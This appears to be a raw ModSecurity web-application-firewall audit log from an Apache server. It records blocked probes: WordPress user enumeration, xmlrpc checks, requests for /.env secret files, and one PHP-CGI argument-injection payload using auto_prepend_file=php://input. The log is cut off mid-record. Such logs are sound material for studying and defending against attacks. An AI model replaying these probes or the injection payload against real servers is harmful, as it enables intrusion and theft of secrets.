charset=iso-8859-1 --0f8e4803-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745625372790830 2682 (- - -) Stopwatch2: 1745625372790830 2682; combined=1363, p1=446, p2=888, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f8e4803-Z-- --f160c44a-A-- [26/Apr/2025:07:09:52 +0700] aAwkUNDEbIDiBZnoTx4EkwAAAEg 103.236.140.4 45900 103.236.140.4 8181 --f160c44a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f160c44a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f160c44a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745626192782819 2326 (- - -) Stopwatch2: 1745626192782819 2326; combined=1322, p1=439, p2=853, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f160c44a-Z-- --18d46348-A-- [26/Apr/2025:07:09:55 +0700] aAwkU9DEbIDiBZnoTx4ElQAAAEk 103.236.140.4 45912 103.236.140.4 8181 --18d46348-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --18d46348-C-- demo.sayHello --18d46348-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --18d46348-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745626195520487 6875 (- - -) Stopwatch2: 1745626195520487 6875; combined=4912, p1=617, p2=4028, p3=38, p4=43, p5=108, sr=118, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18d46348-Z-- --3bd9a53f-A-- [26/Apr/2025:07:12:58 +0700] aAwlCtDEbIDiBZnoTx4EvQAAAEs 103.236.140.4 46604 103.236.140.4 8181 --3bd9a53f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3bd9a53f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3bd9a53f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745626378125849 2784 (- - -) Stopwatch2: 1745626378125849 2784; combined=1437, p1=466, p2=939, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bd9a53f-Z-- --2b96a847-A-- [26/Apr/2025:07:13:00 +0700] aAwlDNQ6lpQjDvc0F_NocgAAANA 103.236.140.4 46620 103.236.140.4 8181 --2b96a847-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2b96a847-C-- demo.sayHello --2b96a847-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b96a847-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745626380878999 6299 (- - -) Stopwatch2: 1745626380878999 6299; combined=4600, p1=591, p2=3767, p3=31, p4=35, p5=103, sr=93, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b96a847-Z-- --72844424-A-- [26/Apr/2025:07:15:47 +0700] aAwls03IXD9XJ6lrmIWepAAAAA4 103.236.140.4 47274 103.236.140.4 8181 --72844424-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --72844424-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72844424-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745626547193448 3116 (- - -) Stopwatch2: 1745626547193448 3116; combined=1355, p1=480, p2=823, p3=0, p4=0, p5=52, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72844424-Z-- --33a3267c-A-- [26/Apr/2025:07:15:50 +0700] aAwlttDEbIDiBZnoTx4E4QAAAEY 103.236.140.4 47290 103.236.140.4 8181 --33a3267c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.15 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --33a3267c-C-- demo.sayHello --33a3267c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --33a3267c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745626550952653 6644 (- - -) Stopwatch2: 1745626550952653 6644; combined=4740, p1=578, p2=3906, p3=37, p4=44, p5=103, sr=74, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33a3267c-Z-- --6f958d4e-A-- [26/Apr/2025:07:21:01 +0700] aAwm7dDEbIDiBZnoTx4FEgAAAEQ 103.236.140.4 48462 103.236.140.4 8181 --6f958d4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6f958d4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f958d4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745626861704658 2618 (- - -) Stopwatch2: 1745626861704658 2618; combined=1081, p1=375, p2=682, p3=0, p4=0, p5=24, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f958d4e-Z-- --a0da7210-A-- [26/Apr/2025:07:21:04 +0700] aAwm8HGCMLWH05JCdxzhjgAAAJU 103.236.140.4 48480 103.236.140.4 8181 --a0da7210-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a0da7210-C-- demo.sayHello --a0da7210-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0da7210-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745626864496297 6292 (- - -) Stopwatch2: 1745626864496297 6292; combined=4301, p1=522, p2=3497, p3=28, p4=33, p5=125, sr=72, sw=96, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0da7210-Z-- --57ed667e-A-- [26/Apr/2025:08:31:48 +0700] aAw3hNQ6lpQjDvc0F_NxlwAAANY 103.236.140.4 56372 103.236.140.4 8181 --57ed667e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.159.155.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.159.155.105 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --57ed667e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57ed667e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745631108917607 3136 (- - -) Stopwatch2: 1745631108917607 3136; combined=1381, p1=470, p2=864, p3=0, p4=0, p5=46, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57ed667e-Z-- --b967154a-A-- [26/Apr/2025:09:07:02 +0700] aAw_xtDEbIDiBZnoTx4isAAAAEc 103.236.140.4 50800 103.236.140.4 8181 --b967154a-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 142.93.129.190 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 142.93.129.190 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --b967154a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b967154a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745633222190932 738 (- - -) Stopwatch2: 1745633222190932 738; combined=251, p1=221, p2=0, p3=0, p4=0, p5=30, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b967154a-Z-- --fcb74931-A-- [26/Apr/2025:09:07:17 +0700] aAw_1XGCMLWH05JCdxz55wAAAJQ 103.236.140.4 51402 103.236.140.4 8181 --fcb74931-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.158.93.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.158.93.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fcb74931-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcb74931-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745633237424305 2507 (- - -) Stopwatch2: 1745633237424305 2507; combined=1167, p1=400, p2=740, p3=0, p4=0, p5=27, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcb74931-Z-- --e43aba64-A-- [26/Apr/2025:09:15:04 +0700] aAxBqNDEbIDiBZnoTx4m4gAAAFY 103.236.140.4 40270 103.236.140.4 8181 --e43aba64-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 107.161.179.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 107.161.179.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e43aba64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e43aba64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745633704843941 3751 (- - -) Stopwatch2: 1745633704843941 3751; combined=1916, p1=616, p2=1265, p3=0, p4=0, p5=35, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e43aba64-Z-- --f85a982b-A-- [26/Apr/2025:09:28:58 +0700] aAxE6k3IXD9XJ6lrmIXILgAAAAk 103.236.140.4 60228 103.236.140.4 8181 --f85a982b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.108.152.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.108.152.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f85a982b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f85a982b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745634538458764 2113 (- - -) Stopwatch2: 1745634538458764 2113; combined=868, p1=285, p2=560, p3=0, p4=0, p5=23, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f85a982b-Z-- --7b666c57-A-- [26/Apr/2025:09:54:28 +0700] aAxK5NDEbIDiBZnoTx44FgAAAFY 103.236.140.4 55564 103.236.140.4 8181 --7b666c57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.12.138 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.12.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --7b666c57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b666c57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745636068147153 834 (- - -) Stopwatch2: 1745636068147153 834; combined=353, p1=309, p2=0, p3=0, p4=0, p5=43, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b666c57-Z-- --e0c23b0f-A-- [26/Apr/2025:10:17:10 +0700] aAxQNtQ6lpQjDvc0F_OrIgAAANQ 103.236.140.4 49252 103.236.140.4 8181 --e0c23b0f-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 165.227.173.41 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 165.227.173.41 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --e0c23b0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0c23b0f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745637430589356 779 (- - -) Stopwatch2: 1745637430589356 779; combined=307, p1=271, p2=0, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0c23b0f-Z-- --cf25c939-A-- [26/Apr/2025:10:32:38 +0700] aAxT1tDEbIDiBZnoTx5FhAAAAE8 103.236.140.4 55596 103.236.140.4 8181 --cf25c939-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.10.250.218 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.10.250.218 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --cf25c939-C-- --cf25c939-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf25c939-E-- --cf25c939-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745638358227177 4993 (- - -) Stopwatch2: 1745638358227177 4993; combined=3409, p1=594, p2=2776, p3=0, p4=0, p5=39, sr=132, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf25c939-Z-- --ce606115-A-- [26/Apr/2025:10:40:57 +0700] aAxVydDEbIDiBZnoTx5GMQAAAE4 103.236.140.4 57606 103.236.140.4 8181 --ce606115-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.103.206.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.103.206.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ce606115-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce606115-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] 